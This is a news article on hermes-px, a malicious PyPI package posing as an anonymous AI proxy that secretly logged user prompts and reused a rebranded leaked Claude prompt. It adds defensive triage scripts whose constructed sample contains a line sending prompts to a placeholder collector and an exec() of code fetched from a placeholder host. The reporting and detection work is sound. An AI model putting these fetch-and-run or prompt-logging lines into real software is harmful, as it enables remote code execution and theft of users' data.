
A Python package presented as a privacy-first shortcut to AI models has been unmasked as a supply-chain threat that quietly captures user prompts, leans on a private university service without authorisation and repurposes proprietary Claude material to make the deception look convincing. Security researchers said the package, hermes-px, was uploaded to PyPI as a supposed “Secure AI Inference Proxy” offering OpenAI-compatible access over Tor and claiming users did not need their own API keys.
Analysis by JFrog, published on April 5, found the package did far more than proxy requests. It configured traffic to pass through Tor, forged browser-style headers and directed requests to an internal chat-completions endpoint tied to Universite Centrale in Tunisia, while also logging every user message to a Supabase endpoint controlled by the attacker. Researchers said that meant victims seeking anonymity were instead handing over their prompts and exposing their real IP details through direct exfiltration outside the Tor path the package advertised.
The package’s social engineering appears to have been unusually polished for a malicious upload. JFrog said the README included migration guidance, error-handling documentation, code examples and even a retrieval-augmented generation feature, helping it resemble a serious developer tool rather than throwaway malware. The package also promoted itself as a product from “EGen Labs”, a name the researchers said was fabricated, and included instructions urging users to fetch and execute remote code straight from GitHub through Python’s exec() function, a pattern long viewed by defenders as a major warning sign.
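The behaviours described above (fetch-and-exec of remote code, Tor SOCKS proxy configuration, and requests to endpoints other than the one a tool advertises) are all visible in a package's source before it is ever run. The following static triage script is an added example written for this article, not JFrog's tooling or any code from hermes-px; the two sample sources it scans are constructed, and the `.test` hostnames are placeholders.

```python
"""Static triage of Python source for the warning signs discussed above:
exec()/eval() applied to network-fetched content, a Tor SOCKS proxy, and
outbound URLs whose host is not among the advertised endpoints.
Added example; sample sources below are constructed, not from any real package."""
import ast
import re
from urllib.parse import urlparse

# Call names that typically return untrusted bytes/text from the network.
FETCH_NAMES = {"get", "post", "urlopen", "request"}
# Tor's default SOCKS ports (9050 for the daemon, 9150 for Tor Browser).
TOR_PROXY_RE = re.compile(r"socks[45]h?://[^/\s'\"]*:(9050|9150)\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?[^\s'\"]*")


def _call_name(node: ast.AST) -> str:
    """Last component of a call target: requests.get -> 'get', exec -> 'exec'."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return ""


def _contains_fetch(node: ast.AST) -> bool:
    """True if any sub-expression calls a known network fetch function."""
    return any(isinstance(n, ast.Call) and _call_name(n.func) in FETCH_NAMES
               for n in ast.walk(node))


def scan_source(source: str, advertised_hosts: set) -> list:
    """Return human-readable findings for one Python source file."""
    findings = []
    tree = ast.parse(source)
    # 1. exec()/eval() whose first argument is derived from a network call.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node.func) in {"exec", "eval"}:
            if node.args and _contains_fetch(node.args[0]):
                findings.append(f"remote code execution: {_call_name(node.func)}() "
                                f"on fetched content (line {node.lineno})")
    # 2. Proxy strings pointing at a local Tor SOCKS port.
    for m in TOR_PROXY_RE.finditer(source):
        findings.append(f"tor proxy configured: {m.group(0)}")
    # 3. Any URL whose host the package does not advertise (possible exfiltration).
    for m in URL_RE.finditer(source):
        host = urlparse(m.group(0)).hostname or ""
        if host and host not in advertised_hosts:
            findings.append(f"undeclared endpoint: {host}")
    return findings


# Constructed sample: a proxy client that only talks to its advertised host.
SAMPLE_BENIGN = '''
import requests
def ask(prompt):
    return requests.post("https://api.example-proxy.test/v1/chat/completions", json={"p": prompt}).json()
'''

# Constructed sample showing all three patterns; hostnames are placeholders.
SAMPLE_SUSPICIOUS = '''
import requests
PROXIES = {"https": "socks5h://127.0.0.1:9050"}
def ask(prompt):
    requests.post("https://logger.example-collector.test/rest/v1/messages", json={"m": prompt})
    return requests.post("https://api.example-proxy.test/v1/chat/completions", json={"p": prompt}, proxies=PROXIES).json()
def update():
    exec(requests.get("https://raw.example-host.test/loader.py").text)
'''

if __name__ == "__main__":
    for name, src in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(name, scan_source(src, {"api.example-proxy.test"}) or ["no findings"])
```

In practice, run `scan_source` over every `.py` file extracted from the wheel or sdist actually installed (not the GitHub repository, which the article notes may differ), with `advertised_hosts` taken from the package's own README. The AST check deliberately ignores `exec()` on string literals so that only code whose input comes off the network is flagged.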
What has drawn particular attention is the package’s use of a large altered system prompt derived from Anthropic’s Claude Code materials. JFrog said a compressed file embedded in hermes-px expanded into a 246,000-character prompt that had been bulk-renamed to replace “Claude” and “Anthropic” references with attacker branding such as “AXIOM-1” and “EGen Labs”. The changes were incomplete, leaving behind enough references to indicate the prompt’s origin. That finding lands days after security researchers reported that Anthropic’s Claude Code source had been exposed through a public npm package source map on March 31, setting off widespread mirroring and analysis of the leaked material.
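A compressed blob that expands into hundreds of thousands of characters of prose is itself a triage signal, and an incomplete bulk rename leaves residue that a simple search will catch. The analyser below is an added example, not JFrog's method or code from the package; it unwraps common compressed encodings, measures the decompressed text and reports brand names that contradict the claimed branding. The sample blob is constructed in the script, and the 100,000-character threshold is an assumed heuristic.

```python
"""Unwrap an embedded compressed blob and check it for an oversized text payload
and leftover references (here 'Claude'/'Anthropic') that contradict the branding
the package claims. Added example; the sample blob is constructed below."""
import base64
import gzip
import re
import zlib
from typing import Optional

LEFTOVER_RE = re.compile(r"\b(Claude|Anthropic)\b")
# Assumed heuristic: a "config" blob this large is prose, not configuration.
LARGE_TEXT_THRESHOLD = 100_000


def _b64(blob: bytes) -> Optional[bytes]:
    """Strict base64 decode; None if the blob is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:
        return None


def decompress_blob(blob: bytes) -> Optional[bytes]:
    """Try gzip and raw zlib on the blob and on its base64-decoded form."""
    for data in (blob, _b64(blob)):
        if data is None:
            continue
        for fn in (gzip.decompress, zlib.decompress):
            try:
                return fn(data)
            except (OSError, zlib.error, EOFError):
                pass
    return None


def analyse_blob(blob: bytes, claimed_brand: str) -> dict:
    """Describe the blob: size of decompressed text and conflicting references."""
    raw = decompress_blob(blob)
    if raw is None:
        return {"compressed": False}
    text = raw.decode("utf-8", errors="replace")
    leftovers = sorted(set(LEFTOVER_RE.findall(text)))
    brand_mentions = text.count(claimed_brand)
    return {
        "compressed": True,
        "chars": len(text),
        "large_text": len(text) >= LARGE_TEXT_THRESHOLD,
        "brand_mentions": brand_mentions,
        "leftover_references": leftovers,
        # Both the claimed brand and the original names present: a rename job.
        "rebranded_origin_suspected": bool(leftovers) and brand_mentions > 0,
    }


def build_sample_blob() -> bytes:
    """Constructed stand-in for an embedded prompt: base64 of zlib-compressed text
    that has been rebranded but still carries one stray original reference."""
    body = ("You are AXIOM-1, an assistant by EGen Labs. " * 3000
            + "This prompt was adapted from Claude documentation.")
    return base64.b64encode(zlib.compress(body.encode()))


if __name__ == "__main__":
    print(analyse_blob(build_sample_blob(), "AXIOM-1"))
    print(analyse_blob(zlib.compress(b'{"model": "axiom"}'), "AXIOM-1"))
```

Run `analyse_blob` over every non-source file shipped in the installed artefact; a result with `large_text` and `rebranded_origin_suspected` both true is the combination the researchers describe and is worth a human read of the decompressed text.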
The overlap between those events points to a fast-moving secondary risk for the AI software ecosystem: once high-value prompts or code leak into public circulation, malicious actors can weaponise them almost immediately in packages aimed at developers. In this case, the prompt was not merely copied; it was repackaged to lend credibility to a non-existent service while masking the real upstream system. JFrog said the package also scrubbed provider references from responses, making it harder for users to understand which model or service was actually producing outputs.
PyPI itself has spent the past two years expanding its anti-malware processes as the volume and sophistication of malicious packages have climbed. The Python Package Index has said community reports are central to its response efforts, introduced a dedicated malware-reporting workflow and, at the end of 2024, added a quarantine feature designed to make suspected projects un-installable while investigations are under way. PyPI has also disclosed that it receives more than 500 inbound malware reports each month, underscoring how common this class of abuse has become.
That backdrop matters because hermes-px does not look like a conventional smash-and-grab credential stealer. Its design reflects a broader shift in software supply-chain threats towards highly themed lures tailored to developers’ workflows, particularly around AI tooling, cloud access and automation. Other PyPI cases documented over the past year have involved packages stealing cloud tokens, exfiltrating credentials through Telegram bots or using suspicious external URLs to pull in second-stage payloads. Security researchers and PyPI administrators have repeatedly warned that a package’s public repository, documentation and project branding may not match the code actually shipped in the installable artefact.
Follow Arabian Post